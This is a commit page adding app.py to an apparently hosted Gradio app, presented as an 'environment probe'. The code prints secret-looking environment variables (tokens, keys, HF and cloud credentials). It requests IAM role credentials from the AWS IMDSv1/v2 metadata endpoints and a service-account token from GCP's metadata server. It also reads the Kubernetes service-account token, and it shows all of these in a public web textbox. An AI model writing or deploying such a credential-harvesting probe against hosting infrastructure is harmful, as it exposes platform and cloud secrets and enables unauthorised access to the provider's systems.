Spaces:
Running
Running
Create app.py
Browse files
app.py
ADDED
|
@@ -0,0 +1,66 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import gradio as gr
|
| 2 |
+
import os
|
| 3 |
+
import urllib.request
|
| 4 |
+
import json
|
| 5 |
+
|
| 6 |
+
def probe_environment():
|
| 7 |
+
output = "================ 1. 环境变量检查 ================\n"
|
| 8 |
+
suspicious_keys = [k for k in os.environ.keys() if any(x in k.upper() for x in ['AWS', 'GCP', 'GOOGLE', 'AZURE', 'TOKEN', 'KEY', 'SECRET', 'CRED', 'HF'])]
|
| 9 |
+
for k in suspicious_keys:
|
| 10 |
+
output += f"{k}: {os.environ[k][:20]}...\n" if len(os.environ[k]) > 20 else f"{k}: {os.environ[k]}\n"
|
| 11 |
+
|
| 12 |
+
if not suspicious_keys:
|
| 13 |
+
output += "未发现明显敏感的环境变量。\n"
|
| 14 |
+
|
| 15 |
+
output += "\n================ 2. 云厂商 IMDS 探测 ================\n"
|
| 16 |
+
|
| 17 |
+
# AWS IMDSv1
|
| 18 |
+
try:
|
| 19 |
+
req = urllib.request.Request("http://169.254.169.254/latest/meta-data/iam/security-credentials/", method="GET")
|
| 20 |
+
with urllib.request.urlopen(req, timeout=2) as response:
|
| 21 |
+
role_name = response.read().decode('utf-8').strip()
|
| 22 |
+
output += f"🚨 AWS IMDSv1 可达! Role: {role_name}\n"
|
| 23 |
+
# 进一步拿凭证
|
| 24 |
+
req2 = urllib.request.Request(f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}", method="GET")
|
| 25 |
+
with urllib.request.urlopen(req2, timeout=2) as res2:
|
| 26 |
+
output += f"凭证信息: {res2.read().decode('utf-8')[:50]}...\n"
|
| 27 |
+
except Exception as e:
|
| 28 |
+
output += "AWS IMDSv1 阻断或不存在。\n"
|
| 29 |
+
|
| 30 |
+
# AWS IMDSv2
|
| 31 |
+
try:
|
| 32 |
+
req_token = urllib.request.Request("http://169.254.169.254/latest/api/token", method="PUT", headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
|
| 33 |
+
with urllib.request.urlopen(req_token, timeout=2) as res_token:
|
| 34 |
+
token = res_token.read().decode('utf-8')
|
| 35 |
+
req_v2 = urllib.request.Request("http://169.254.169.254/latest/meta-data/iam/security-credentials/", method="GET", headers={"X-aws-ec2-metadata-token": token})
|
| 36 |
+
with urllib.request.urlopen(req_v2, timeout=2) as res_v2:
|
| 37 |
+
role_name = res_v2.read().decode('utf-8').strip()
|
| 38 |
+
output += f"🚨 AWS IMDSv2 可达! Role: {role_name}\n"
|
| 39 |
+
except Exception as e:
|
| 40 |
+
output += "AWS IMDSv2 阻断或不存在。\n"
|
| 41 |
+
|
| 42 |
+
# GCP IMDS
|
| 43 |
+
try:
|
| 44 |
+
req_gcp = urllib.request.Request("http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token", method="GET", headers={"Metadata-Flavor": "Google"})
|
| 45 |
+
with urllib.request.urlopen(req_gcp, timeout=2) as res_gcp:
|
| 46 |
+
output += f"🚨 GCP IMDS 可达! Token: {res_gcp.read().decode('utf-8')[:50]}...\n"
|
| 47 |
+
except Exception as e:
|
| 48 |
+
output += "GCP IMDS 阻断或不存在。\n"
|
| 49 |
+
|
| 50 |
+
# 读取 K8s token
|
| 51 |
+
output += "\n================ 3. 本地凭据文件 ================\n"
|
| 52 |
+
try:
|
| 53 |
+
with open("/var/run/secrets/kubernetes.io/serviceaccount/token", "r") as f:
|
| 54 |
+
output += f"⚠️ K8s Token: {f.read()[:20]}...\n"
|
| 55 |
+
except Exception:
|
| 56 |
+
output += "未发现 K8s token。\n"
|
| 57 |
+
|
| 58 |
+
return output
|
| 59 |
+
|
| 60 |
+
with gr.Blocks() as demo:
|
| 61 |
+
gr.Markdown("## 环境探测器")
|
| 62 |
+
out = gr.Textbox(label="探测结果", lines=20)
|
| 63 |
+
btn = gr.Button("开始探测")
|
| 64 |
+
btn.click(fn=probe_environment, inputs=[], outputs=out)
|
| 65 |
+
|
| 66 |
+
demo.launch()
|